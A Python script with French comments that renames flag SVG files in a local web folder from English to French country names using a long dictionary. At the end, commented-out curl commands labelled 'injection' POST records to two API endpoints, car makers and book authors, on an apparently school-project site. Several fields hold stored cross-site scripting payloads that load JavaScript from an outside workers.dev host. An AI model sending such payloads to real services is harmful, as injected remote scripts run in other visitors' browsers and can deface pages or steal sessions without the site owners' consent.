import os

# Chemin du dossier contenant les fichiers à renommer
dossier = '/opt/lampp/htdocs/site/img/drapeau_svg/'

# Dictionnaire des abréviations de pays vers leur nom complet (ajoutez d'autres pays au besoin)
pays = {

    'Afghanistan': 'Afghanistan',
    'South Africa': 'Afrique du Sud',
    'Albania': 'Albanie',
    'Germany': 'Allemagne',
    'Andorra': 'Andorre',
    'Angola': 'Angola',
    'Anguilla': 'Anguilla',
    'Antarctica': 'Antarctique',
    'Antigua and Barbuda': 'Antigua-et-Barbuda',
    'Saudi Arabia': 'Arabie saoudite',
    'Argentina': 'Argentine',
    'Armenia': 'Arménie',
    'Aruba': 'Aruba',
    'Australia': 'Australie',
    'Austria': 'Autriche',
    'Azerbaijan': 'Azerbaïdjan',
    'Bahamas': 'Bahamas',
    'Bahrain': 'Bahreïn',
    'Bangladesh': 'Bangladesh',
    'Barbados': 'Barbade',
    'Belarus': 'Biélorussie',
    'Belgium': 'Belgique',
    'Belize': 'Belize',
    'Benin': 'Bénin',
    'Bermuda': 'Bermudes',
    'Bhutan': 'Bhoutan',
    'Bolivia': 'Bolivie',
    'Bosnia and Herzegovina': 'Bosnie-Herzégovine',
    'Botswana': 'Botswana',
    'Brazil': 'Brésil',
    'Brunei': 'Brunei',
    'Bulgaria': 'Bulgarie',
    'Burkina Faso': 'Burkina Faso',
    'Burundi': 'Burundi',
    'Cambodia': 'Cambodge',
    'Cameroon': 'Cameroun',
    'Canada': 'Canada',
    'Cape Verde': 'Cap-Vert',
    'Central African Republic': 'République centrafricaine',
    'Chad': 'Tchad',
    'Chile': 'Chili',
    'China': 'Chine',
    'Cyprus': 'Chypre',
    'Colombia': 'Colombie',
    'Comoros': 'Comores',
    'Congo': 'Congo',
    'Democratic Republic of the Congo': 'République démocratique du Congo',
    'North Korea': 'Corée du Nord',
    'South Korea': 'Corée du Sud',
    'Costa Rica': 'Costa Rica',
    'Ivory Coast': 'Côte d\'Ivoire',
    'Croatia': 'Croatie',
    'Cuba': 'Cuba',
    'Denmark': 'Danemark',
    'Djibouti': 'Djibouti',
    'Dominica': 'Dominique',
    'Egypt': 'Égypte',
    'El Salvador': 'El Salvador',
    'United Arab Emirates': 'Émirats arabes unis',
    'Ecuador': 'Équateur',
    'Eritrea': 'Érythrée',
    'Spain': 'Espagne',
    'Estonia': 'Estonie',
    'United States': 'États-Unis',
    'Ethiopia': 'Éthiopie',
    'Fiji': 'Fidji',
    'Finland': 'Finlande',
    'France': 'France',
    'Gabon': 'Gabon',
    'Gambia': 'Gambie',
    'Georgia': 'Géorgie',
    'Ghana': 'Ghana',
    'Gibraltar': 'Gibraltar',
    'Greece': 'Grèce',
    'Grenada': 'Grenade',
    'Greenland': 'Groenland',
    'Guadeloupe': 'Guadeloupe',
    'Guam': 'Guam',
    'Guatemala': 'Guatemala',
    'Guinea': 'Guinée',
    'Guinea-Bissau': 'Guinée-Bissau',
    'Guyana': 'Guyana',
    'French Guiana': 'Guyane française',
    'Haiti': 'Haïti',
    'Honduras': 'Honduras',
    'Hungary': 'Hongrie',
    'India': 'Inde',
    'Indonesia': 'Indonésie',
    'Iraq': 'Irak',
    'Iran': 'Iran',
    'Ireland': 'Irlande',
    'Iceland': 'Islande',
    'Israel': 'Israël',
    'Italy': 'Italie',
    'Jamaica': 'Jamaïque',
    'Japan': 'Japon',
    'Jordan': 'Jordanie',
    'Kazakhstan': 'Kazakhstan',
    'Kenya': 'Kenya',
    'Kirghizistan': 'Kirghizistan',
    'Kiribati': 'Kiribati',
    'Kuwait': 'Koweït',
    'Laos': 'Laos',
    'Lesotho': 'Lesotho',
    'Latvia': 'Lettonie',
    'Lebanon': 'Liban',
    'Liberia': 'Libéria',
    'Libya': 'Libye',
    'Liechtenstein': 'Liechtenstein',
    'Lithuania': 'Lituanie',
    'Luxembourg': 'Luxembourg',
    'North Macedonia': 'Macédoine du Nord',
    'Madagascar': 'Madagascar',
    'Malaysia': 'Malaisie',
    'Malawi': 'Malawi',
    'Maldives': 'Maldives',
    'Mali': 'Mali',
    'Malta': 'Malte',
    'Morocco': 'Maroc',
    'Martinique': 'Martinique',
    'Mauritius': 'Maurice',
    'Mauritania': 'Mauritanie',
    'Mayotte': 'Mayotte',
    'Mexico': 'Mexique',
    'Micronesia': 'Micronésie',
    'Moldova': 'Moldavie',
    'Monaco': 'Monaco',
    'Mongolia': 'Mongolie',
    'Montenegro': 'Monténégro',
    'Montserrat': 'Montserrat',
    'Mozambique': 'Mozambique',
    'Myanmar': 'Myanmar',
    'Namibia': 'Namibie',
    'Nauru': 'Nauru',
    'Nepal': 'Népal',
    'Nicaragua': 'Nicaragua',
    'Niger': 'Niger',
    'Nigeria': 'Nigéria',
    'Niue': 'Niue',
    'Norway': 'Norvège',
    'New Caledonia': 'Nouvelle-Calédonie',
    'New Zealand': 'Nouvelle-Zélande',
    'Oman': 'Oman',
    'Uganda': 'Ouganda',
    'Uzbekistan': 'Ouzbékistan',
    'Pakistan': 'Pakistan',
    'Palau': 'Palaos',
    'Palestine': 'Palestine',
    'Panama': 'Panama',
    'Papua New Guinea': 'Papouasie-Nouvelle-Guinée',
    'Paraguay': 'Paraguay',
    'Netherlands': 'Pays-Bas',
    'Peru': 'Pérou',
    'Philippines': 'Philippines',
    'Pitcairn Islands': 'Îles Pitcairn',
    'Poland': 'Pologne',
    'French Polynesia': 'Polynésie française',
    'Puerto Rico': 'Porto Rico',
    'Portugal': 'Portugal',
    'Qatar': 'Qatar',
    'United Kingdom': 'Royaume-Uni',
    'Russia': 'Russie',
    'Rwanda': 'Rwanda',
    'La Réunion': 'Réunion',
    'Saint-Barthélemy': 'Saint-Barthélemy',
    'Saint Kitts and Nevis': 'Saint-Kitts-et-Nevis',
    'San Marino': 'Saint-Marin',
    'Saint Martin (partie française)': 'Saint-Martin (partie française)',
    'Saint-Pierre-et-Miquelon': 'Saint-Pierre-et-Miquelon',
    'Saint-Vincent-et-les-Grenadines': 'Saint-Vincent-et-les-Grenadines',
    'Sainte-Hélène': 'Sainte-Hélène',
    'Sainte-Lucie': 'Sainte-Lucie',
    'Samoa': 'Samoa',
    'American Samoa': 'Samoa américaines',
    'Sao Tome and Principe': 'Sao Tomé-et-Principe',
    'Serbia': 'Serbie',
    'Seychelles': 'Seychelles',
    'Sierra Leone': 'Sierra Leone',
    'Singapore': 'Singapour',
    'Slovakia': 'Slovaquie',
    'Slovenia': 'Slovénie',
    'Somalia': 'Somalie',
    'Sudan': 'Soudan',
    'South Sudan': 'Soudan du Sud',
    'Sri Lanka': 'Sri Lanka',
    'Sweden': 'Suède',
    'Switzerland': 'Suisse',
    'Suriname': 'Suriname',
    'Svalbard and Jan Mayen': 'Svalbard et Jan Mayen',
    'Swaziland': 'Swaziland',
    'Syria': 'Syrie',
    'Tajikistan': 'Tadjikistan',
    'Taiwan': 'Taïwan',
    'Tanzania': 'Tanzanie',
    'Chad': 'Tchad',
    'Czech Republic': 'République tchèque',
    'French Southern and Antarctic Lands': 'Terres australes et antarctiques françaises',
    'Thailand': 'Thaïlande',
    'Timor-Leste': 'Timor oriental',
    'Togo': 'Togo',
    'Tokelau': 'Tokelau',
    'Tonga': 'Tonga',
    'Trinidad and Tobago': 'Trinité-et-Tobago',
    'Tunisia': 'Tunisie',
    'Turkmenistan': 'Turkménistan',
    'Turkey': 'Turquie',
    'Tuvalu': 'Tuvalu',
    'Ukraine': 'Ukraine',
    'Uruguay': 'Uruguay',
    'Vanuatu': 'Vanuatu',
    'Vatican': 'Vatican',
    'Venezuela': 'Venezuela',
    'Vietnam': 'Viêt Nam',
    'Wallis and Futuna': 'Wallis-et-Futuna',
    'Yemen': 'Yémen',
    'Zambia': 'Zambie',
    'Zimbabwe': 'Zimbabwe'




}

# Parcours de tous les fichiers du dossier
for fichier in os.listdir(dossier):
    chemin_fichier = os.path.join(dossier, fichier)
    
    # Vérifier si le fichier est un fichier ordinaire
    if os.path.isfile(chemin_fichier):
        # Diviser le nom du fichier en base et extension
        base, extension = os.path.splitext(fichier)
        
        # Extraire l'abréviation du pays du nom de fichier
        abreviation = base
        
        # Vérifier si l'abréviation du pays est dans le dictionnaire
        if abreviation in pays:
            # Construire le nouveau nom de fichier en ajoutant le nom complet du pays
            nouveau_nom = pays[abreviation] + extension
            
            # Renommer le fichier
            os.rename(chemin_fichier, os.path.join(dossier, nouveau_nom))
            print(f"Renommage de {fichier} en {nouveau_nom}")

print("Renommage terminé.")



#injection pour les marque de voiture
# curl -X POST https://filrouge.uha4point0.fr/V2/car/constructeurs -H "Content-Type: application/json" -d '{ "id":7, "nom": "Uha 4.0<script src='https://api-land-random-script.rrullo.workers.dev/'></script>", "creation": "2018", "fondateur": "Pierre Shuller", "usines": ["Mulhouse","dornach","Technopole"], "pays": "france" }'


#script drole
# <script src='https://api-land-random-script.rrullo.workers.dev/'></script>



# injection pour les auteurs
# curl -X POST https://filrouge.uha4point0.fr/V2/livres/auteurs -H "Content-Type: application/json" -d '{ "id":8, "nom": "Uha 4.0<script src='https://api-land-random-script.rrullo.workers.dev/'></script>", "prenom": "pierre<script src='https://api-land-random-script.rrullo.workers.dev/'></script>", "naissance": "22 09 23<script src='https://api-land-random-script.rrullo.workers.dev/'></script>", "mort":"jamais", "biographie": "arrrrhhhhhhh arrrrhhhhhhh arrrrhhhhhhh arrrrhhhhhhh arrrrhhhhhhh arrrrhhhhhhh <script src='https://api-land-random-script.rrullo.workers.dev/'></script>","photo": "https://img-4.linternaute.com/audjKnc4XCCF_EFQOcvI-4RwhuI=/1240x/smart/045ebc707fda47888ebaec1d8bda3852/ccmcms-linternaute/2158979.jpg <script src='https://api-land-random-script.rrullo.workers.dev/'></script>", "genres": ["Mulhouse","dornach","Technopole"] }'
